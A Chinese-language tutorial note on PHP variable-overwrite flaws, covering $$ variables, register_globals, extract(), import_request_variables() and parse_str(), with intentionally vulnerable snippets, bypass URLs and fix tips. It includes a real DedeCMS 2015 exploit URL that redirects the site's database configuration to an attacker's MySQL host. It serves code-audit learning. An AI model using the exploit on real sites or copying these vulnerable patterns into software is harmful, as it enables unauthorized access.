變量覆蓋漏洞

先看一段代碼：

<?php

$a='aaa';
$aaa='xxx';
echo $$a; //$$a=$($a)=$(aaa)='xxx'

?>

最后回顯的是xxx，講實話，我第一次明白了這個原理后，不禁吐槽，啥？這就是世界上最好的語言？？？這種低級錯誤還能有？

我們再回到漏洞本身：

<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<?php

$a='aa';
$aa='123';
echo '第一次變量aa的值是'.$aa.'<br>';
$$a=$_GET['name'];
echo '第二次變量aa的值是'.$aa.'<br>'; //$$a=$($a)=$aa=$_GET

?>

 

發現：代碼審計，掃描工具掃不出

變量覆蓋漏洞大多數由函數使用不當導致，經常引發變量覆蓋漏洞的函數有：extract(),parse_str()和import_request_variables()

織夢dedecms的2015年一次變量覆蓋：

http://www.xx.com/織夢網站后台

/login.php?dopost=login&validate=dcug&useri

d=賬號&pwd=密碼& _POST[GLOBALS] 
[cfg_dbhost]=MYSQL外鏈IP&_POST[GLOBALS] [cfg_dbuser]=MYSQL的賬號

&_POST[GLOBALS][cfg_dbpwd]=MYSQL的密碼&

_POST[GLOBALS] [cfg_dbname]=自己的dedecms的數據庫

變量覆蓋導致重寫為任意數據庫配置

 

 

這塊內容有點難懂，轉載下來時常翻：

 

一、全局變量覆蓋
當register_global=ON時，變量來源可能是各個不同的地方，比如頁面的表單，Cookie等。

<?php
echo "Register_globals: ".(int)ini_get("register_globals")."<br/>";

if ($auth){
   echo "private!";
}
?>

 

當register_globals=OFF時，這段代碼不會出問題。
但是當register_globals=ON時，提交請求URL：http://www.a.com/test.php?auth=1,變量$auth將自動得到賦值。得到的結果為
Register_globals:1

private!

小記：如果上面的代碼中，已經對變量$auth賦了初始值，比如$auth=0，那么即使在URL中有/test.php?auth=1，也不會將變量覆蓋，也就是說不會打印出private！

利用：

通過$GLOBALS獲取的變量，也可能導致變量覆蓋。

 

<?php
echo "Register_globals:".(int)ini_get("register_globals")."<br/>";
if (ini_get('register_globals')) foreach($_REQUEST as $k=>$v) unset(${$k});
print $a;
print $_GET[b];
?>

 

變量$a未初始化，在register_globals=ON時，再嘗試控制“$a”的值（http://www.a.com/test1.php?a=1&b=2），會因為這段代碼而出錯。
而當嘗試注入“GLOBALS[a]”以覆蓋全局變量時（http://www.a.com/test1.php?GLOBALS[a]=1&b=2），則可以成功控制變量“$a”的值。這是因為unset()默認只會銷毀局部變量，要銷毀全局變量必須使用$GLOBALS。
而在register_globals=OFF時，則無法覆蓋到全局變量。
小記：register_globals的意思是注冊為全局變量，所以當On的時候，傳遞過來的值會被直接注冊為全局變量而直接使用，當為OFF的時候，就需要到特定的數組中去得到它。unset用於釋放給定的變量
二、extract()變量覆蓋

<?php

$auth = '0';
extract($_GET)；

if($auth==1){
echo "private!";
}else{
echo "public!";
}
?>

 

假設用戶構造以下鏈接：http://www.a.com/test1.php?auth=1
界面上會打印出private！

安全的做法是確定register_globals=OFF后，在調用extract()時使用EXTR_SKIP保證已有變量不會被覆蓋。

小記：PHP extract() 函數從數組中把變量導入到當前的符號表中。對於數組中的每個元素，鍵名用於變量名，鍵值用於變量值。

三、遍歷初始化變量

常見的一些以遍歷的方式釋放變量的代碼，可能會導致變量覆蓋。

    <?  
    $chs = '';  
    if($_POST && $charset != 'utf-8'){  
        $chs = new Chinese('UTF-8', $charset);  
        foreach($_POST as $key => $value){  
            $$key = $chs->Convert($value);  
        }  
        unset($chs);  
    }  
    ?>  

 

若提交參數chs，則可覆蓋變量"$chs"的值。

小記：在代碼審計時需要注意類似“$$k”的變量賦值方式有可能覆蓋已有的變量，從而導致一些不可控制的結果。

四、import_request_variables變量覆蓋

    <?php  
    $auth = '0';  
    import_request_variables('G');  
      
    if($auth == 1){  
      echo "private!";  
    }else{  
      echo "public!";  
    }  
    ?>  

 

當用戶輸入http://www.a.com/test1.php?auth=1時，網頁上會輸出private！

import_request_variables('G')指定導入GET請求中的變量，從而導致變量覆蓋。

小記：import_request_variables — 將 GET／POST／Cookie 變量導入到全局作用域中。如果你禁止了 register_globals，但又想用到一些全局變量，那么此函數就很有用。

五、parse_str()變量覆蓋

    //var.php?var=new  
    $var='init';  
    parse_str($_SERVER['QUERY_STRING']);  
    print $var;  

 

與parse_str()類似的函數還有mb_parse_str()

小記：parse_str — 將字符串解析成多個變量，如果參數str是URL傳遞入的查詢字符串（query string），則將它解析為變量並設置到當前作用域。

 

 

修復，用到這些變量的時候，自己檢測可能性，尤其是當foreach涉及鍵名鍵值時